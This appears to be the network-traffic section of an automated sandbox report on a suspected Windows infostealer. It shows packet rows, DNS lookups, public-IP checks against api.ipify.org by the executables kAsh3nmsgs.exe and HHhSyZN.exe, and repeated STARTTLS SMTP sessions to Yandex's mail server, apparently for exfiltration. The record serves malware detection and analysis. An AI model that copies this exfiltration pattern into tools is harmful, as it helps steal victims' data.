                                                                                                              Jan 11, 2025 09:27:23.312591076 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.313004971 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:23.317807913 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.527745008 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.527978897 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.528028011 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.528064013 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:23.542876959 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.543261051 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:23.548105955 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.614665985 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.614722013 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:23.616755009 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:23.621556997 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.830271959 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.831569910 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:23.836344004 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.887425900 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:23.890803099 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:23.895589113 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:24.044378996 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:24.046583891 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:24.051345110 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:24.118448019 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:24.122931004 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:24.122931004 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:24.123032093 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:24.123111010 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:24.124237061 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:24.127778053 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:24.127877951 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:24.127887964 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:24.127931118 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:24.127969027 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:24.129055023 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.715135098 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.717245102 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.722167015 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899594069 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899637938 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899651051 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899696112 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899755001 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.899755001 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.901602983 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.906450033 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.944278002 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.945163965 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.949878931 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.119801998 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.120870113 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.125590086 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.171619892 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.171840906 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.176589966 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.338740110 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.339303017 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.344166994 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.398482084 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.399064064 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.403886080 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.557415009 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.558576107 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.563379049 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.641566038 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.641820908 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.646620989 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.797991037 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.798954010 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.803746939 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.873913050 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.874135017 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.878873110 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.029911041 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.030195951 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.035912991 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.199681044 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.199887037 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.204749107 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.362030983 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.362499952 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.367273092 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.426527023 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.426915884 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.426953077 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.426970959 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.427011967 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.428159952 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.431765079 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.431776047 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.431787968 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.431829929 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.431900024 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.432003021 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.432997942 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433016062 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433046103 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433057070 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433065891 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433080912 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433104992 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433125973 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433128119 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433139086 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433186054 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433216095 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433224916 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433235884 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433281898 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.436589003 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.436650038 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.436816931 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.436867952 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.437856913 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.437907934 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438003063 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438014030 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438051939 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438064098 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438067913 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438113928 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438127041 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438190937 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438196898 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438242912 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438307047 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438325882 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438378096 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438400030 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438443899 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.441535950 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.441673040 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.442662954 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.442847013 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.442886114 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.442955017 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443018913 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443073988 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443120956 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443213940 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443264961 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443348885 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443358898 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443459034 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443469048 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443478107 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443486929 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443502903 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443511963 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443639994 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443649054 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443659067 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443666935 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443676949 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.580529928 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.580919981 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.580974102 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.580974102 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.581111908 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.582504988 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.585697889 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.585766077 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.585777044 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.585887909 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.586585045 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.587353945 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587363958 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587459087 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.587506056 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587517023 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587527990 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587537050 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587546110 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587560892 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587569952 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587613106 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.591413975 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.591516972 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.591825962 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592204094 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592349052 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592494011 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592519045 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592536926 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592559099 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592588902 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592633009 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592633009 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592694044 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592704058 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592749119 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.596647024 CET5875004177.88.21.158192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 09:23:26.502270937 CET | 58685 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 09:23:26.509385109 CET | 53 | 58685 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 09:23:28.064258099 CET | 61399 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 09:23:28.163331985 CET | 53 | 61399 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 09:23:26.502270937 CET | 192.168.2.4 | 1.1.1.1 | 0xdde8 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:23:28.064258099 CET | 192.168.2.4 | 1.1.1.1 | 0xe479 | Standard query (0) | smtp.yandex.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 09:23:26.509385109 CET | 1.1.1.1 | 192.168.2.4 | 0xdde8 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:23:26.509385109 CET | 1.1.1.1 | 192.168.2.4 | 0xdde8 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:23:26.509385109 CET | 1.1.1.1 | 192.168.2.4 | 0xdde8 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:23:28.163331985 CET | 1.1.1.1 | 192.168.2.4 | 0xe479 | No error (0) | smtp.yandex.com | smtp.yandex.ru | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:23:28.163331985 CET | 1.1.1.1 | 192.168.2.4 | 0xe479 | No error (0) | smtp.yandex.ru | | 77.88.21.158 | A (IP address) | IN (0x0001) | false
• api.ipify.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 104.26.13.205 | 443 | 7412 | C:\Users\user\Desktop\kAsh3nmsgs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 08:23:27 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2025-01-11 08:23:27 UTC | 424 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 08:23:27 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 9003813ac9e75e79-EWR
    server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1834170&cwnd=225&unsent_bytes=0&cid=a6bc1fcf31a2f0ff&ts=246&x=0"
2025-01-11 08:23:27 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
    Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 104.26.13.205 | 443 | 7836 | C:\Users\user\AppData\Roaming\HHhSyZN.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 08:23:30 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2025-01-11 08:23:30 UTC | 424 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 08:23:30 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 900381524a254307-EWR
    server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1551&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1814791&cwnd=239&unsent_bytes=0&cid=3e674efc2b61417a&ts=263&x=0"
2025-01-11 08:23:30 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
    Data Ascii: 8.46.123.189


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 11, 2025 09:23:29.023623943 CET | 587 | 49734 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1736583808-SNkJ5EBOdKo0
Jan 11, 2025 09:23:29.023920059 CET | 49734 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:23:29.263776064 CET | 587 | 49734 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:23:29.263958931 CET | 49734 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:23:29.503464937 CET | 587 | 49734 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:23:32.282655001 CET | 587 | 49738 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net Ok 1736583812-WNkUWKBMgCg0
Jan 11, 2025 09:23:32.282916069 CET | 49738 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:23:32.515456915 CET | 587 | 49738 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:23:32.517553091 CET | 49738 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:23:32.749799013 CET | 587 | 49738 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:24:58.454283953 CET | 587 | 49979 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net Ok 1736583898-wOko7u7OkOs0
Jan 11, 2025 09:24:58.454502106 CET | 49979 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:24:58.678211927 CET | 587 | 49979 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:24:58.678400040 CET | 49979 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:24:58.899570942 CET | 587 | 49979 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:25:05.596077919 CET | 587 | 50014 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net Ok 1736583905-5PkY947Ok8c0
Jan 11, 2025 09:25:05.596230030 CET | 50014 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:05.820884943 CET | 587 | 50014 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:25:05.821156025 CET | 50014 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:25:06.657536983 CET | 587 | 50015 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net Ok 1736583906-6Pkf7EBOd8c0
Jan 11, 2025 09:25:06.657810926 CET | 50015 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:06.887729883 CET | 587 | 50015 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:25:06.890706062 CET | 50015 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:25:07.117974043 CET | 587 | 50015 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:25:14.319103956 CET | 587 | 50016 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-35.klg.yp-c.yandex.net Ok 1736583914-EPkUKHAOpCg0
Jan 11, 2025 09:25:14.319278955 CET | 50016 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:14.538232088 CET | 587 | 50016 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-35.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:25:14.538539886 CET | 50016 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:25:14.758341074 CET | 587 | 50016 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:25:20.059930086 CET | 587 | 50017 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-42.klg.yp-c.yandex.net Ok 1736583919-JPkTDMAOjKo0
Jan 11, 2025 09:25:20.060060978 CET | 50017 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:20.290060043 CET | 587 | 50017 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-42.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:25:20.290206909 CET | 50017 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:25:20.519932985 CET | 587 | 50017 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:25:21.393100023 CET | 587 | 50018 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1736583921-LPkkrEBOgGk0
Jan 11, 2025 09:25:21.393271923 CET | 50018 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:21.628933907 CET | 587 | 50018 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:25:21.629147053 CET | 50018 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:25:21.915047884 CET | 587 | 50018 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
